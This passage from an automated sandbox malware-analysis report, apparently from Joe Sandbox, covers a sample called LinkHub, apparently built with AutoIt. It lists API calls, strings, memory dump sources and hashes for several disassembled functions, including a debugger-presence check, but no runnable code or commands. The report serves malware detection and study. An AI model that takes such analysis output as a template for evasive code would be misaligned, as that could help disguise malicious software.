                                                                                        • Opcode Fuzzy Hash: f06526e953ddb3a5b5929f9e9cb39b7d7edc9adf749f38f0d4fa49bdd90d98c0
                                                                                        • Instruction Fuzzy Hash: 30F0B4A5124149AADB14DF91D850EF973B8DF04701F10416ABCC9C7290EBB48FA0E365
                                                                                        Function 00298432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0020249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002024B0
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00298471
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0029847F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow
                                                                                        • String ID: (-
                                                                                        • API String ID: 1378638983-4239615555
                                                                                        • Opcode ID: d77cd550cb46b960ea572097ae3329b235028db8e05c5cfeaf93d1f05b737ba7
                                                                                        • Instruction ID: 2d301ace28f310428c9b4d01fb5d400197ab4b1022bf7bfe6d77bc7f57022e32
                                                                                        • Opcode Fuzzy Hash: d77cd550cb46b960ea572097ae3329b235028db8e05c5cfeaf93d1f05b737ba7
                                                                                        • Instruction Fuzzy Hash: 6CF04F31511245DFCB04DF68EC58D6A77A9FF96320B24462AFA26C73F0CB309825DB10
                                                                                        Function 00261461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0026146F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 2030045667-4017498283
                                                                                        • Opcode ID: da04c3a870759e032a32d81b0668581bf2a79bfebc1d5793800602a4f8b12b73
                                                                                        • Instruction ID: 485a85ba0f9af6323ef329c4b139eb1b8586d432afa1112042cfab8a72fb4376
                                                                                        • Opcode Fuzzy Hash: da04c3a870759e032a32d81b0668581bf2a79bfebc1d5793800602a4f8b12b73
                                                                                        • Instruction Fuzzy Hash: F2E048312687253BD71437D4BC47F9576848F05B51F15442AF78C554C38EF264B06699
                                                                                        Function 002210B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0021FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002210E2,?,?,?,0020100A), ref: 0021FAD9
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0020100A), ref: 002210E6
                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0020100A), ref: 002210F5
                                                                                        Strings
                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002210F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                        • API String ID: 55579361-631824599
                                                                                        • Opcode ID: 6d02fc9f251ef2be479fa70613ad248eeb2fbd79e4629c26ff3b30d8d459a2bd
                                                                                        • Instruction ID: ccc7f429d54b70f8a7d4d53bebb75b52aeb857258797de892518c58ce20d5987
                                                                                        • Opcode Fuzzy Hash: 6d02fc9f251ef2be479fa70613ad248eeb2fbd79e4629c26ff3b30d8d459a2bd
                                                                                        • Instruction Fuzzy Hash: 4EE09270A103218BD3709F64FA48B42BBE4AF14300F008D5DEC89C2252EFB4E4A4CF91
                                                                                        Function 0021F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0021F151
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID: `5-$h5-
                                                                                        • API String ID: 1385522511-4115059202
                                                                                        • Opcode ID: 1f03e31064e2681d2c5de7c2e277174465d4fb7c2a129e940ea102ef4499ac54
                                                                                        • Instruction ID: 1ee217e7a540be6a21ba7314744e31af92d5862dd9deaf51be5e0cc45734d5a9
                                                                                        • Opcode Fuzzy Hash: 1f03e31064e2681d2c5de7c2e277174465d4fb7c2a129e940ea102ef4499ac54
                                                                                        • Instruction Fuzzy Hash: 14E02031835594FBC640DB1CF9459C433D0F71E330BD002B6E12647391C7241EA2CE16
                                                                                        Function 002739D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002739F0
                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00273A05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: 3e484952985a5a77a52dbdb697b5b3e8a6ee96ec9604afa1081109eb38dc1be9
                                                                                        • Instruction ID: 2d185f141994ee814888ffe8cebef03bc5328aa324a57ccd84e3772b2ce4d60e
                                                                                        • Opcode Fuzzy Hash: 3e484952985a5a77a52dbdb697b5b3e8a6ee96ec9604afa1081109eb38dc1be9
                                                                                        • Instruction Fuzzy Hash: 2AD05B7194031467DB209754AC0DFCB7A6CDB45750F0002917E5592091DAB0E545CB90
                                                                                        Function 00292DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00292DC8
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00292DDB
                                                                                          • Part of subcall function 0026F292: Sleep.KERNEL32 ref: 0026F30A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 8c15f6fdd69e47929d6a88ea2fa678b0004ddc4d4215fe1c6a2b6ff6533bdf80
                                                                                        • Instruction ID: fb087eccaf3840efc5751ac399ffe35fce6e95c6d6ca1b36904cd2301f8b877f
                                                                                        • Opcode Fuzzy Hash: 8c15f6fdd69e47929d6a88ea2fa678b0004ddc4d4215fe1c6a2b6ff6533bdf80
                                                                                        • Instruction Fuzzy Hash: 98D0A9363A4300B6E668A330BC0FFD26A149B00B00F1008267609AA0C0C8A068108A50
                                                                                        Function 00292DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00292E08
                                                                                        • PostMessageW.USER32(00000000), ref: 00292E0F
                                                                                          • Part of subcall function 0026F292: Sleep.KERNEL32 ref: 0026F30A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: a9bf569186c2c5106f977fd668f4518f159c753ef87471f9637c6f51e7f2262c
                                                                                        • Instruction ID: 969e0d512ca56fb7cb7c772df1474cd1ddbe79165f1bd1f449b4ca778efe15a7
                                                                                        • Opcode Fuzzy Hash: a9bf569186c2c5106f977fd668f4518f159c753ef87471f9637c6f51e7f2262c
                                                                                        • Instruction Fuzzy Hash: 27D0A9323D13007AE668A330BC0FFC26A149B00B00F5008267609AA0C0C8A068108A54
                                                                                        Function 0023C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0023C213
                                                                                        • GetLastError.KERNEL32 ref: 0023C221
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0023C27C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1717984340-0
                                                                                        • Opcode ID: 45becf15627f7afa67db58ec96a64f403ce365a4fe97ba6ece09eeb58af5aac5
                                                                                        • Instruction ID: cf2d56109f93eab8fbf7432c96f3fcfab1b5f3e53efaac86ae93dc0b89f4def6
                                                                                        • Opcode Fuzzy Hash: 45becf15627f7afa67db58ec96a64f403ce365a4fe97ba6ece09eeb58af5aac5
                                                                                        • Instruction Fuzzy Hash: D741E7B1620216EFDB219FE4D848ABB77A5EF11710F35416AEC69B71A1DB708C20DB60